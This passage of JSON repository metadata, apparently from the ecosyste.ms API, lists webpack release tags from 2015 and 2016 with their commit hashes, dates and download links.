0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"20